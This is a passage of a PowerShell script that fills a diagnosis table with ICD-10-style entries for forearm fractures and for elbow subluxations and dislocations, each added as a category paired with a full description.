fracture of lower end of right ulna, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of lower end of right ulna","Other fracture of lower end of right ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of lower end of right ulna","Other fracture of lower end of right ulna, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of lower end of right ulna","Other fracture of lower end of right ulna, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of lower end of right ulna","Other fracture of lower end of right ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of lower end of right ulna","Other fracture of lower end of right ulna, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Other fracture of lower end of right ulna","Other fracture of lower end of right ulna, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Other fracture of lower end of right ulna","Other fracture of lower end of right ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Other fracture of lower end of right ulna","Other fracture of lower end of right ulna, sequela") + $null = $DiagnosisList.Rows.Add("Other fracture of lower end of left ulna","Other fracture of lower end of left ulna, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other fracture of lower end of left ulna","Other fracture of lower end of left ulna, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Other fracture of lower end of left ulna","Other fracture of lower end of left ulna, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Other fracture of lower end of left ulna","Other fracture of lower end of left ulna, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of lower end of left ulna","Other fracture of lower end of left ulna, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of lower end of left ulna","Other fracture of lower end of left ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of lower end of left ulna","Other fracture of lower end of left ulna, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of lower end of left ulna","Other fracture of lower end of left ulna, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of lower end of left ulna","Other fracture of lower end of left ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of lower end of left ulna","Other fracture of lower end of left ulna, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of lower end of left ulna","Other fracture of lower end of left ulna, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of lower end of left ulna","Other fracture of lower end of left ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of lower end of left ulna","Other fracture of lower end of left ulna, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Other fracture of lower end of left ulna","Other fracture of lower end of left ulna, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Other fracture of lower end of left ulna","Other fracture of lower end of left ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Other fracture of lower end of left ulna","Other fracture of lower end of left ulna, sequela") + $null = $DiagnosisList.Rows.Add("Other fracture of lower end of unspecified ulna","Other fracture of lower end of unspecified ulna, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other fracture of lower end of unspecified ulna","Other fracture of lower end of unspecified ulna, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Other fracture of lower end of unspecified ulna","Other fracture of lower end of unspecified ulna, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Other fracture of lower end of unspecified ulna","Other fracture of lower end of unspecified ulna, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of lower end of unspecified ulna","Other fracture of lower end of unspecified ulna, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of lower end of unspecified ulna","Other fracture of lower end of unspecified ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of lower end of unspecified ulna","Other fracture of lower end of unspecified ulna, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of lower end of unspecified ulna","Other fracture of lower end of unspecified ulna, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of lower end of unspecified ulna","Other fracture of lower end of unspecified ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of lower end of unspecified ulna","Other fracture of lower end of unspecified ulna, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of lower end of unspecified ulna","Other fracture of lower end of unspecified ulna, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of lower end of unspecified ulna","Other fracture of lower end of unspecified ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of lower end of unspecified ulna","Other fracture of lower end of unspecified ulna, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Other fracture of lower end of unspecified ulna","Other fracture of lower end of unspecified ulna, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Other fracture of lower end of unspecified ulna","Other fracture of lower end of unspecified ulna, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Other fracture of lower end of unspecified ulna","Other fracture of lower end of unspecified ulna, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of unspecified forearm","Unspecified fracture of unspecified forearm, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of unspecified forearm","Unspecified fracture of unspecified forearm, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of unspecified forearm","Unspecified fracture of unspecified forearm, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of unspecified forearm","Unspecified fracture of unspecified forearm, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of unspecified forearm","Unspecified fracture of unspecified forearm, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of unspecified forearm","Unspecified fracture of unspecified forearm, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of unspecified forearm","Unspecified fracture of unspecified forearm, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of unspecified forearm","Unspecified fracture of unspecified forearm, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of unspecified forearm","Unspecified fracture of unspecified forearm, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of unspecified forearm","Unspecified fracture of unspecified forearm, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of unspecified forearm","Unspecified fracture of unspecified forearm, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of unspecified forearm","Unspecified fracture of unspecified forearm, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of unspecified forearm","Unspecified fracture of unspecified forearm, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of unspecified forearm","Unspecified fracture of unspecified forearm, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of unspecified forearm","Unspecified fracture of unspecified forearm, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of unspecified forearm","Unspecified fracture of unspecified forearm, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of right forearm","Unspecified fracture of right forearm, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of right forearm","Unspecified fracture of right forearm, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of right forearm","Unspecified fracture of right forearm, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of right forearm","Unspecified fracture of right forearm, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of right forearm","Unspecified fracture of right forearm, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of right forearm","Unspecified fracture of right forearm, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of right forearm","Unspecified fracture of right forearm, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of right forearm","Unspecified fracture of right forearm, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of right forearm","Unspecified fracture of right forearm, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of right forearm","Unspecified fracture of right forearm, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of right forearm","Unspecified fracture of right forearm, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of right forearm","Unspecified fracture of right forearm, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of right forearm","Unspecified fracture of right forearm, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of right forearm","Unspecified fracture of right forearm, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of right forearm","Unspecified fracture of right forearm, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of right forearm","Unspecified fracture of right forearm, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of left forearm","Unspecified fracture of left forearm, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of left forearm","Unspecified fracture of left forearm, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of left forearm","Unspecified fracture of left forearm, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of left forearm","Unspecified fracture of left forearm, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of left forearm","Unspecified fracture of left forearm, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of left forearm","Unspecified fracture of left forearm, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of left forearm","Unspecified fracture of left forearm, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of left forearm","Unspecified fracture of left forearm, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of left forearm","Unspecified fracture of left forearm, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of left forearm","Unspecified fracture of left forearm, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of left forearm","Unspecified fracture of left forearm, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of left forearm","Unspecified fracture of left forearm, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of left forearm","Unspecified fracture of left forearm, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of left forearm","Unspecified fracture of left forearm, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of left forearm","Unspecified fracture of left forearm, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of left forearm","Unspecified fracture of left forearm, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified subluxation of right radial head","Unspecified subluxation of right radial head, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified subluxation of right radial head","Unspecified subluxation of right radial head, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified subluxation of right radial head","Unspecified subluxation of right radial head, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified subluxation of left radial head","Unspecified subluxation of left radial head, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified subluxation of left radial head","Unspecified subluxation of left radial head, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified subluxation of left radial head","Unspecified subluxation of left radial head, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified subluxation of unspecified radial head","Unspecified subluxation of unspecified radial head, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified subluxation of unspecified radial head","Unspecified subluxation of unspecified radial head, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified subluxation of unspecified radial head","Unspecified subluxation of unspecified radial head, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified dislocation of right radial head","Unspecified dislocation of right radial head, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified dislocation of right radial head","Unspecified dislocation of right radial head, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified dislocation of right radial head","Unspecified dislocation of right radial head, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified dislocation of left radial head","Unspecified dislocation of left radial head, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified dislocation of left radial head","Unspecified dislocation of left radial head, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified dislocation of left radial head","Unspecified dislocation of left radial head, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified dislocation of unspecified radial head","Unspecified dislocation of unspecified radial head, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified dislocation of unspecified radial head","Unspecified dislocation of unspecified radial head, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified dislocation of unspecified radial head","Unspecified dislocation of unspecified radial head, sequela") + $null = $DiagnosisList.Rows.Add("Anterior subluxation of right radial head","Anterior subluxation of right radial head, initial encounter") + $null = $DiagnosisList.Rows.Add("Anterior subluxation of right radial head","Anterior subluxation of right radial head, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Anterior subluxation of right radial head","Anterior subluxation of right radial head, sequela") + $null = $DiagnosisList.Rows.Add("Anterior subluxation of left radial head","Anterior subluxation of left radial head, initial encounter") + $null = $DiagnosisList.Rows.Add("Anterior subluxation of left radial head","Anterior subluxation of left radial head, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Anterior subluxation of left radial head","Anterior subluxation of left radial head, sequela") + $null = $DiagnosisList.Rows.Add("Anterior subluxation of unspecified radial head","Anterior subluxation of unspecified radial head, initial encounter") + $null = $DiagnosisList.Rows.Add("Anterior subluxation of unspecified radial head","Anterior subluxation of unspecified radial head, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Anterior subluxation of unspecified radial head","Anterior subluxation of unspecified radial head, sequela") + $null = $DiagnosisList.Rows.Add("Anterior dislocation of right radial head","Anterior dislocation of right radial head, initial encounter") + $null = $DiagnosisList.Rows.Add("Anterior dislocation of right radial head","Anterior dislocation of right radial head, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Anterior dislocation of right radial head","Anterior dislocation of right radial head, sequela") + $null = $DiagnosisList.Rows.Add("Anterior dislocation of left radial head","Anterior dislocation of left radial head, initial encounter") + $null = $DiagnosisList.Rows.Add("Anterior dislocation of left radial head","Anterior dislocation of left radial head, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Anterior dislocation of left radial head","Anterior dislocation of left radial head, sequela") + $null = $DiagnosisList.Rows.Add("Anterior dislocation of unspecified radial head","Anterior dislocation of unspecified radial head, initial encounter") + $null = $DiagnosisList.Rows.Add("Anterior dislocation of unspecified radial head","Anterior dislocation of unspecified radial head, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Anterior dislocation of unspecified radial head","Anterior dislocation of unspecified radial head, sequela") + $null = $DiagnosisList.Rows.Add("Posterior subluxation of right radial head","Posterior subluxation of right radial head, initial encounter") + $null = $DiagnosisList.Rows.Add("Posterior subluxation of right radial head","Posterior subluxation of right radial head, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Posterior subluxation of right radial head","Posterior subluxation of right radial head, sequela") + $null = $DiagnosisList.Rows.Add("Posterior subluxation of left radial head","Posterior subluxation of left radial head, initial encounter") + $null = $DiagnosisList.Rows.Add("Posterior subluxation of left radial head","Posterior subluxation of left radial head, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Posterior subluxation of left radial head","Posterior subluxation of left radial head, sequela") + $null = $DiagnosisList.Rows.Add("Posterior subluxation of unspecified radial head","Posterior subluxation of unspecified radial head, initial encounter") + $null = $DiagnosisList.Rows.Add("Posterior subluxation of unspecified radial head","Posterior subluxation of unspecified radial head, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Posterior subluxation of unspecified radial head","Posterior subluxation of unspecified radial head, sequela") + $null = $DiagnosisList.Rows.Add("Posterior dislocation of right radial head","Posterior dislocation of right radial head, initial encounter") + $null = $DiagnosisList.Rows.Add("Posterior dislocation of right radial head","Posterior dislocation of right radial head, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Posterior dislocation of right radial head","Posterior dislocation of right radial head, sequela") + $null = $DiagnosisList.Rows.Add("Posterior dislocation of left radial head","Posterior dislocation of left radial head, initial encounter") + $null = $DiagnosisList.Rows.Add("Posterior dislocation of left radial head","Posterior dislocation of left radial head, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Posterior dislocation of left radial head","Posterior dislocation of left radial head, sequela") + $null = $DiagnosisList.Rows.Add("Posterior dislocation of unspecified radial head","Posterior dislocation of unspecified radial head, initial encounter") + $null = $DiagnosisList.Rows.Add("Posterior dislocation of unspecified radial head","Posterior dislocation of unspecified radial head, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Posterior dislocation of unspecified radial head","Posterior dislocation of unspecified radial head, sequela") + $null = $DiagnosisList.Rows.Add("Nursemaid's elbow, right elbow","Nursemaid's elbow, right elbow, initial encounter") + $null = $DiagnosisList.Rows.Add("Nursemaid's elbow, right elbow","Nursemaid's elbow, right elbow, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Nursemaid's elbow, right elbow","Nursemaid's elbow, right elbow, sequela") + $null = $DiagnosisList.Rows.Add("Nursemaid's elbow, left elbow","Nursemaid's elbow, left elbow, initial encounter") + $null = $DiagnosisList.Rows.Add("Nursemaid's elbow, left elbow","Nursemaid's elbow, left elbow, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Nursemaid's elbow, left elbow","Nursemaid's elbow, left elbow, sequela") + $null = $DiagnosisList.Rows.Add("Nursemaid's elbow, unspecified elbow","Nursemaid's elbow, unspecified elbow, initial encounter") + $null = $DiagnosisList.Rows.Add("Nursemaid's elbow, unspecified elbow","Nursemaid's elbow, unspecified elbow, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Nursemaid's elbow, unspecified elbow","Nursemaid's elbow, unspecified elbow, sequela") + $null = $DiagnosisList.Rows.Add("Other subluxation of right radial head","Other subluxation of right radial head, initial encounter") + $null = $DiagnosisList.Rows.Add("Other subluxation of right radial head","Other subluxation of right radial head, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other subluxation of right radial head","Other subluxation of right radial head, sequela") + $null = $DiagnosisList.Rows.Add("Other subluxation of left radial head","Other subluxation of left radial head, initial encounter") + $null = $DiagnosisList.Rows.Add("Other subluxation of left radial head","Other subluxation of left radial head, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other subluxation of left radial head","Other subluxation of left radial head, sequela") + $null = $DiagnosisList.Rows.Add("Other subluxation of unspecified radial head","Other subluxation of unspecified radial head, initial encounter") + $null = $DiagnosisList.Rows.Add("Other subluxation of unspecified radial head","Other subluxation of unspecified radial head, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other subluxation of unspecified radial head","Other subluxation of unspecified radial head, sequela") + $null = $DiagnosisList.Rows.Add("Other dislocation of right radial head","Other dislocation of right radial head, initial encounter") + $null = $DiagnosisList.Rows.Add("Other dislocation of right radial head","Other dislocation of right radial head, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other dislocation of right radial head","Other dislocation of right radial head, sequela") + $null = $DiagnosisList.Rows.Add("Other dislocation of left radial head","Other dislocation of left radial head, initial encounter") + $null = $DiagnosisList.Rows.Add("Other dislocation of left radial head","Other dislocation of left radial head, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other dislocation of left radial head","Other dislocation of left radial head, sequela") + $null = $DiagnosisList.Rows.Add("Other dislocation of unspecified radial head","Other dislocation of unspecified radial head, initial encounter") + $null = $DiagnosisList.Rows.Add("Other dislocation of unspecified radial head","Other dislocation of unspecified radial head, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other dislocation of unspecified radial head","Other dislocation of unspecified radial head, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified subluxation of right ulnohumeral joint","Unspecified subluxation of right ulnohumeral joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified subluxation of right ulnohumeral joint","Unspecified subluxation of right ulnohumeral joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified subluxation of right ulnohumeral joint","Unspecified subluxation of right ulnohumeral joint, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified subluxation of left ulnohumeral joint","Unspecified subluxation of left ulnohumeral joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified subluxation of left ulnohumeral joint","Unspecified subluxation of left ulnohumeral joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified subluxation of left ulnohumeral joint","Unspecified subluxation of left ulnohumeral joint, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified subluxation of unspecified ulnohumeral joint","Unspecified subluxation of unspecified ulnohumeral joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified subluxation of unspecified ulnohumeral joint","Unspecified subluxation of unspecified ulnohumeral joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified subluxation of unspecified ulnohumeral joint","Unspecified subluxation of unspecified ulnohumeral joint, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified dislocation of right ulnohumeral joint","Unspecified dislocation of right ulnohumeral joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified dislocation of right ulnohumeral joint","Unspecified dislocation of right ulnohumeral joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified dislocation of right ulnohumeral joint","Unspecified dislocation of right ulnohumeral joint, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified dislocation of left ulnohumeral joint","Unspecified dislocation of left ulnohumeral joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified dislocation of left ulnohumeral joint","Unspecified dislocation of left ulnohumeral joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified dislocation of left ulnohumeral joint","Unspecified dislocation of left ulnohumeral joint, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified dislocation of unspecified ulnohumeral joint","Unspecified dislocation of unspecified ulnohumeral joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified dislocation of unspecified ulnohumeral joint","Unspecified dislocation of unspecified ulnohumeral joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified dislocation of unspecified ulnohumeral joint","Unspecified dislocation of unspecified ulnohumeral joint, sequela") + $null = $DiagnosisList.Rows.Add("Anterior subluxation of right ulnohumeral joint","Anterior subluxation of right ulnohumeral joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Anterior subluxation of right ulnohumeral joint","Anterior subluxation of right ulnohumeral joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Anterior subluxation of right ulnohumeral joint","Anterior subluxation of right ulnohumeral joint, sequela") + $null = $DiagnosisList.Rows.Add("Anterior subluxation of left ulnohumeral joint","Anterior subluxation of left ulnohumeral joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Anterior subluxation of left ulnohumeral joint","Anterior subluxation of left ulnohumeral joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Anterior subluxation of left ulnohumeral joint","Anterior subluxation of left ulnohumeral joint, sequela") + $null = $DiagnosisList.Rows.Add("Anterior subluxation of unspecified ulnohumeral joint","Anterior subluxation of unspecified ulnohumeral joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Anterior subluxation of unspecified ulnohumeral joint","Anterior subluxation of unspecified ulnohumeral joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Anterior subluxation of unspecified ulnohumeral joint","Anterior subluxation of unspecified ulnohumeral joint, sequela") + $null = $DiagnosisList.Rows.Add("Anterior dislocation of right ulnohumeral joint","Anterior dislocation of right ulnohumeral joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Anterior dislocation of right ulnohumeral joint","Anterior dislocation of right ulnohumeral joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Anterior dislocation of right ulnohumeral joint","Anterior dislocation of right ulnohumeral joint, sequela") + $null = $DiagnosisList.Rows.Add("Anterior dislocation of left ulnohumeral joint","Anterior dislocation of left ulnohumeral joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Anterior dislocation of left ulnohumeral joint","Anterior dislocation of left ulnohumeral joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Anterior dislocation of left ulnohumeral joint","Anterior dislocation of left ulnohumeral joint, sequela") + $null = $DiagnosisList.Rows.Add("Anterior dislocation of unspecified ulnohumeral joint","Anterior dislocation of unspecified ulnohumeral joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Anterior dislocation of unspecified ulnohumeral joint","Anterior dislocation of unspecified ulnohumeral joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Anterior dislocation of unspecified ulnohumeral joint","Anterior dislocation of unspecified ulnohumeral joint, sequela") + $null = $DiagnosisList.Rows.Add("Posterior subluxation of right ulnohumeral joint","Posterior subluxation of right ulnohumeral joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Posterior subluxation of right ulnohumeral joint","Posterior subluxation of right ulnohumeral joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Posterior subluxation of right ulnohumeral joint","Posterior subluxation of right ulnohumeral joint, sequela") + $null = $DiagnosisList.Rows.Add("Posterior subluxation of left ulnohumeral joint","Posterior subluxation of left ulnohumeral joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Posterior subluxation of left ulnohumeral joint","Posterior subluxation of left ulnohumeral joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Posterior subluxation of left ulnohumeral joint","Posterior subluxation of left ulnohumeral joint, sequela") + $null = $DiagnosisList.Rows.Add("Posterior subluxation of unspecified ulnohumeral joint","Posterior subluxation of unspecified ulnohumeral joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Posterior subluxation of unspecified ulnohumeral joint","Posterior subluxation of unspecified ulnohumeral joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Posterior subluxation of unspecified ulnohumeral joint","Posterior subluxation of unspecified ulnohumeral joint, sequela") + $null = $DiagnosisList.Rows.Add("Posterior dislocation of right ulnohumeral joint","Posterior dislocation of right ulnohumeral joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Posterior dislocation of right ulnohumeral joint","Posterior dislocation of right ulnohumeral joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Posterior dislocation of right ulnohumeral joint","Posterior dislocation of right ulnohumeral joint, sequela") + $null = $DiagnosisList.Rows.Add("Posterior dislocation of left ulnohumeral joint","Posterior dislocation of left ulnohumeral joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Posterior dislocation of left ulnohumeral joint","Posterior dislocation of left ulnohumeral joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Posterior dislocation of left ulnohumeral joint","Posterior dislocation of left ulnohumeral joint, sequela") + $null = $DiagnosisList.Rows.Add("Posterior dislocation of unspecified ulnohumeral joint","Posterior dislocation of unspecified ulnohumeral joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Posterior dislocation of unspecified ulnohumeral joint","Posterior dislocation of unspecified ulnohumeral joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Posterior dislocation of unspecified ulnohumeral joint","Posterior dislocation of unspecified ulnohumeral joint, sequela") + $null = $DiagnosisList.Rows.Add("Medial subluxation of right ulnohumeral joint","Medial subluxation of right ulnohumeral joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Medial subluxation of right ulnohumeral joint","Medial subluxation of right ulnohumeral joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Medial subluxation of right ulnohumeral joint","Medial subluxation of right ulnohumeral joint, sequela") + $null = $DiagnosisList.Rows.Add("Medial subluxation of left ulnohumeral joint","Medial subluxation of left ulnohumeral 